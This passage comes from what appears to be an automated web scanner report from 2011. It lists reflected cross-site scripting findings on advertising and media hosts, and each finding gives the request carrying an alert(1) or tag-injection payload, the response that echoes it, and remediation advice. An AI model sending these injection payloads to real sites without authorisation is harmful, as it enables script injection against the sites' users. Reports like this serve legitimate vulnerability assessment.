   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10736/179745/adj/N5823.8705.MLB/B5918949.616677"-alert(1)-"52a76ba1058;sz=160x600;ord=2586041",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gtt0yh8l"
};


(function(){v
...[SNIP]...

2.66. http://fw.adsafeprotected.com/rjss/dc/10736/179745/adj/N5823.8705.MLB/B5918949.6 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/dc/10736/179745/adj/N5823.8705.MLB/B5918949.6

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fb23"-alert(1)-"d03d05de2dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/dc/10736/179745/adj/N5823.8705.MLB/B5918949.6;sz=160x600;ord=2586041?&5fb23"-alert(1)-"d03d05de2dd=1 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=7570417714305222
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=082AB5E86F802B239B6BA532292C7307

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A6B86F4E1A63B036F555CD266574653B; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:29:55 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=7570417714305222",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10736/179745/adj/N5823.8705.MLB/B5918949.6;sz=160x600;ord=2586041?&5fb23"-alert(1)-"d03d05de2dd=1",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gtt0ygdi"
};


(function(){var O="3.13.1";var w=(
...[SNIP]...

2.67. http://fw.adsafeprotected.com/rjss/dc/10736/179745/adj/N5823.8705.MLB/B5918949.6 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/dc/10736/179745/adj/N5823.8705.MLB/B5918949.6

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68857"-alert(1)-"35970ee03f4 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/dc/10736/179745/adj/N5823.8705.MLB/B5918949.6;sz=160x600;ord=2586041?68857"-alert(1)-"35970ee03f4 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=7570417714305222
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=082AB5E86F802B239B6BA532292C7307

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A1CDA210928890B018A20AA6F88FA3A5; Path=/
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:29:54 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=7570417714305222",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10736/179745/adj/N5823.8705.MLB/B5918949.6;sz=160x600;ord=2586041?68857"-alert(1)-"35970ee03f4",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gtt0ygam"
};


(function(){var O="3.13.1";var w=(ad
...[SNIP]...

2.68. http://guru.sitescout.com/tag.jsp [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guru.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 760e5'%3balert(1)//b9ddebd4e1f was submitted in the h parameter. This input was echoed as 760e5';alert(1)//b9ddebd4e1f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=75C8C16&w=300&h=250760e5'%3balert(1)//b9ddebd4e1f&rnd=5017564884&cm=http://r1-ads.ace.advertising.com/click/site=0000804802/mnum=0001075190/cstr=35424750=_4e88eaf4,5017564884,804802^1075190^1184^0,1_/xsxdata=$XSXDATA/bnum=35424750/optn=64?trg= HTTP/1.1
Host: guru.sitescout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://demr.opt.fimserve.com/adopt/?r=h&l=99990003&pos=mrec&rnd=923342291
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 621
Date: Sun, 02 Oct 2011 22:54:06 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://guru.sitescout.com/disp?pid=75C8C16&rw=1&cm=http%3A%2F%2Fr1-ads.ace.advertising.com%2Fclick%2Fsite%3D0000804802%2Fmnum%3D000107519
...[SNIP]...
<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300" HEIGHT="250760e5';alert(1)//b9ddebd4e1f" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

2.69. http://guru.sitescout.com/tag.jsp [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guru.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf733"%3balert(1)//776e245df9c was submitted in the pid parameter. This input was echoed as cf733";alert(1)//776e245df9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=75C8C16cf733"%3balert(1)//776e245df9c&w=300&h=250&rnd=5017564884&cm=http://r1-ads.ace.advertising.com/click/site=0000804802/mnum=0001075190/cstr=35424750=_4e88eaf4,5017564884,804802^1075190^1184^0,1_/xsxdata=$XSXDATA/bnum=35424750/optn=64?trg= HTTP/1.1
Host: guru.sitescout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://demr.opt.fimserve.com/adopt/?r=h&l=99990003&pos=mrec&rnd=923342291
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 621
Date: Sun, 02 Oct 2011 22:54:03 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://guru.sitescout.com/disp?pid=75C8C16cf733";alert(1)//776e245df9c&rw=1&cm=http%3A%2F%2Fr1-ads.ace.advertising.com%2Fclick%2Fsite%3D0000804802%2Fmnum%3D0001075190%2Fcstr%3D35424750%3D_4e88eaf4%2C5017564884%2C804802%5E1075190%5E1184%5E0%2C1_%2Fxsxdata%3D%24XSXDATA%2Fb
...[SNIP]...

2.70. http://guru.sitescout.com/tag.jsp [w parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guru.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38cb2'%3balert(1)//96f10c267d5 was submitted in the w parameter. This input was echoed as 38cb2';alert(1)//96f10c267d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=75C8C16&w=30038cb2'%3balert(1)//96f10c267d5&h=250&rnd=5017564884&cm=http://r1-ads.ace.advertising.com/click/site=0000804802/mnum=0001075190/cstr=35424750=_4e88eaf4,5017564884,804802^1075190^1184^0,1_/xsxdata=$XSXDATA/bnum=35424750/optn=64?trg= HTTP/1.1
Host: guru.sitescout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://demr.opt.fimserve.com/adopt/?r=h&l=99990003&pos=mrec&rnd=923342291
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 621
Date: Sun, 02 Oct 2011 22:54:05 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://guru.sitescout.com/disp?pid=75C8C16&rw=1&cm=http%3A%2F%2Fr1-ads.ace.advertising.com%2Fclick%2Fsite%3D0000804802%2Fmnum%3D000107519
...[SNIP]...
<IFRAME SRC="'
+ pUrl
+ '" WIDTH="30038cb2';alert(1)//96f10c267d5" HEIGHT="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

2.71. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 1bf29<script>alert(1)</script>cf97cd26bdb was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=K055401bf29<script>alert(1)</script>cf97cd26bdb HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 02 Oct 2011 22:59:01 GMT
Cache-Control: max-age=86400, private
Expires: Mon, 03 Oct 2011 22:59:01 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 22:59:01 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "K055401BF29<SCRIPT>ALERT(1)</SCRIPT>CF97CD26BDB" was not recognized.
*/

2.72. http://link.theplatform.com/s/fox.com/zcBJwfcpENJ_ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://link.theplatform.com
Path:   /s/fox.com/zcBJwfcpENJ_

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e5378<script>alert(1)</script>993b4f5c19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /se5378<script>alert(1)</script>993b4f5c19/fox.com/zcBJwfcpENJ_?mbr=true&feed=Homepage%20Player%20-%20Network%20HP%20Featured%20Clips&sig=004e88ec226357987f042ac5047ad79ba4c6b4dd944d84f14a466f784b6579&format=SMIL&Tracking=true&Embedded=true HTTP/1.1
Host: link.theplatform.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 02 Oct 2011 23:00:13 GMT
Content-Type: text/html; charset=iso-8859-1
Cache-Control: must-revalidate,no-cache,no-store
Content-Length: 1427
Server: Jetty(6.1.19)

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<title>Error 404 NOT_FOUND</title>
</head>
<body><h2>HTTP ERROR 404</h2>
<p>Problem accessing /se5378<script>alert(1)</script>993b4f5c19/fox.com/zcBJwfcpENJ_. Reason:
<pre>
...[SNIP]...

2.73. http://link.theplatform.com/s/fox.com/zcBJwfcpENJ_ [feed parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://link.theplatform.com
Path:   /s/fox.com/zcBJwfcpENJ_

Issue detail

The value of the feed request parameter is copied into the HTML document as plain text between tags. The payload 8b9db<script>alert(1)</script>697e3b18685 was submitted in the feed parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /s/fox.com/zcBJwfcpENJ_?mbr=true&feed=Homepage%20Player%20-%20Network%20HP%20Featured%20Clips8b9db<script>alert(1)</script>697e3b18685&sig=004e88ec226357987f042ac5047ad79ba4c6b4dd944d84f14a466f784b6579&format=SMIL&Tracking=true&Embedded=true HTTP/1.1
Host: link.theplatform.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:00:11 GMT
Access-Control-Allow-Origin: *
Content-Type: application/smil; charset=UTF-8
X-Cache: HIT from link.theplatform.com:80
Cache-Control: max-age=5
Connection: close
Server: Jetty(6.1.19)

<smil xmlns="http://www.w3.org/2005/SMIL21/Language">
<head>
</head>
<body>
<seq>
<switch>
   <video src="http://fbchdvod-f.akamaihd.net/z/Fox.com/2/261/fr_the_bridge_final_2500.mp4?hdnea=ip=50.23.123.1
...[SNIP]...
<param name="trackingData" value="b=333060|cc=US|ci=1|cid=1315664|d=1317596411266|l=135082|p=Homepage Player - Network HP Featured Clips8b9db<script>alert(1)</script>697e3b18685|rc=TX|rid=1315779"/>
...[SNIP]...

2.74. http://link.theplatform.com/s/fox.com/zcBJwfcpENJ_ [format parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://link.theplatform.com
Path:   /s/fox.com/zcBJwfcpENJ_

Issue detail

The value of the format request parameter is copied into the HTML document as plain text between tags. The payload f888e<script>alert(1)</script>32e218dcb1f was submitted in the format parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /s/fox.com/zcBJwfcpENJ_?mbr=true&feed=Homepage%20Player%20-%20Network%20HP%20Featured%20Clips&sig=004e88ec226357987f042ac5047ad79ba4c6b4dd944d84f14a466f784b6579&format=SMILf888e<script>alert(1)</script>32e218dcb1f&Tracking=true&Embedded=true HTTP/1.1
Host: link.theplatform.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Request
Date: Sun, 02 Oct 2011 23:00:11 GMT
Access-Control-Allow-Origin: *
Cache-Control: no-cache, no-store
Connection: close
Server: Jetty(6.1.19)

{
   "title": "Unsupported Metafile Format",
   "description": "'SMILf888e<script>alert(1)</script>32e218dcb1f' is not a supported metafile format.",
   "isException": true,
   "exception": "UnsupportedFormat",
   "responseCode": "400"
}

2.75. http://link.theplatform.com/s/fox.com/zcBJwfcpENJ_ [height parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://link.theplatform.com
Path:   /s/fox.com/zcBJwfcpENJ_

Issue detail

The value of the height request parameter is copied into the HTML document as plain text between tags. The payload 2f62d<script>alert(1)</script>a15e2a993fb was submitted in the height parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /s/fox.com/zcBJwfcpENJ_?mbr=true&feed=Homepage%20Player%20-%20Network%20HP%20Featured%20Clips&format=Script&Tracking=true&Embedded=true&sig=004e88ed2575d1cb75f6e818965b31dad5124cdad97b4f7bca466f784b6579&height=2082f62d<script>alert(1)</script>a15e2a993fb&width=378 HTTP/1.1
Host: link.theplatform.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:09:14 GMT
Access-Control-Allow-Origin: *
Cache-Control: no-cache, no-store
Content-Type: text/plain; charset=utf-8
Connection: close
Server: Jetty(6.1.19)

{
   "title": "Non-numeric Height",
   "description": "Height value '2082f62d<script>alert(1)</script>a15e2a993fb' is not numeric.",
   "isException": true,
   "exception": "NonNumericHeight",
   "responseCode": "400"
}

2.76. http://link.theplatform.com/s/fox.com/zcBJwfcpENJ_ [width parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://link.theplatform.com
Path:   /s/fox.com/zcBJwfcpENJ_

Issue detail

The value of the width request parameter is copied into the HTML document as plain text between tags. The payload 40ee9<script>alert(1)</script>ad035f486cd was submitted in the width parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /s/fox.com/zcBJwfcpENJ_?mbr=true&feed=Homepage%20Player%20-%20Network%20HP%20Featured%20Clips&format=Script&Tracking=true&Embedded=true&sig=004e88ed2575d1cb75f6e818965b31dad5124cdad97b4f7bca466f784b6579&height=208&width=37840ee9<script>alert(1)</script>ad035f486cd HTTP/1.1
Host: link.theplatform.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:09:15 GMT
Access-Control-Allow-Origin: *
Cache-Control: no-cache, no-store
Content-Type: text/plain; charset=utf-8
Connection: close
Server: Jetty(6.1.19)

{
   "title": "Non-numeric Width",
   "description": "Width value '37840ee9<script>alert(1)</script>ad035f486cd' is not numeric.",
   "isException": true,
   "exception": "NonNumericWidth",
   "responseCode": "400"
}

2.77. http://link.theplatform.com/s/fox.com/zcBJwfcpENJ_/tracker.log [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://link.theplatform.com
Path:   /s/fox.com/zcBJwfcpENJ_/tracker.log

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aad7e<script>alert(1)</script>13a34c04f95 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /saad7e<script>alert(1)</script>13a34c04f95/fox.com/zcBJwfcpENJ_/tracker.log?type=qos&ver=2&d=1317596138497&cc=US&rc=TX&p=Homepage%20Player%20-%20Network%20HP%20Featured%20Clips&rid0=1315779&t0=The%20Bridge&tc0=1&lp0=583&lt0=0&pb0=100&pp0=0.43&pr0=0&nocache=1317596160823 HTTP/1.1
Host: link.theplatform.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 02 Oct 2011 23:01:24 GMT
Content-Type: text/html; charset=iso-8859-1
Cache-Control: must-revalidate,no-cache,no-store
Content-Length: 1440
Server: Jetty(6.1.19)

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<title>Error 404 NOT_FOUND</title>
</head>
<body><h2>HTTP ERROR 404</h2>
<p>Problem accessing /saad7e<script>alert(1)</script>13a34c04f95/fox.com/zcBJwfcpENJ_/tracker.log. Reason:
<pre>
...[SNIP]...

2.78. http://mads.cbs.com/mac-ad [ADREQ&SP parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the ADREQ&SP request parameter is copied into the HTML document as plain text between tags. The payload ab61b<a>6ae5f203bfd was submitted in the ADREQ&SP parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119ab61b<a>6ae5f203bfd&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=c%3Bpage%3Dcbshome; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:02:42 GMT
Server: Apache/2.2
Content-Length: 563
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:02:42 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119ab61b<a>6ae5f203bfd&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' SP='1196165203' CNET-PTYPE='10' POS='100' NCAT='1:' CNET-PARTNER-ID='1' DVAR_PSID='' ) TO _
...[SNIP]...

2.79. http://mads.cbs.com/mac-ad [ADREQ&beacon parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the ADREQ&beacon request parameter is copied into the HTML document as plain text between tags. The payload a7ecb<a>11653f77f27 was submitted in the ADREQ&beacon parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=58164046&ADREQ&beacon=1a7ecb<a>11653f77f27&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=c%3Bpage%3Dcbshome; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:04:45 GMT
Server: Apache/2.2
Content-Length: 468
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:04:45 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=58164046&ADREQ&beacon=1a7ecb<a>11653f77f27&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: INCORRECT BEACON='17116537727' SPECIFIED. BEACON CALL FAILED. *//* MAC [r20110907-1630-TRUNKPOSTMERGE:1.13.14] phx1-ad-xw11.cnet.com::1279625536 2011.10.
...[SNIP]...

2.80. http://mads.cbs.com/mac-ad [BRAND parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the BRAND request parameter is copied into the HTML document as plain text between tags. The payload 5e057<a>9282d93155d was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=575e057<a>9282d93155d&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=58164046&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
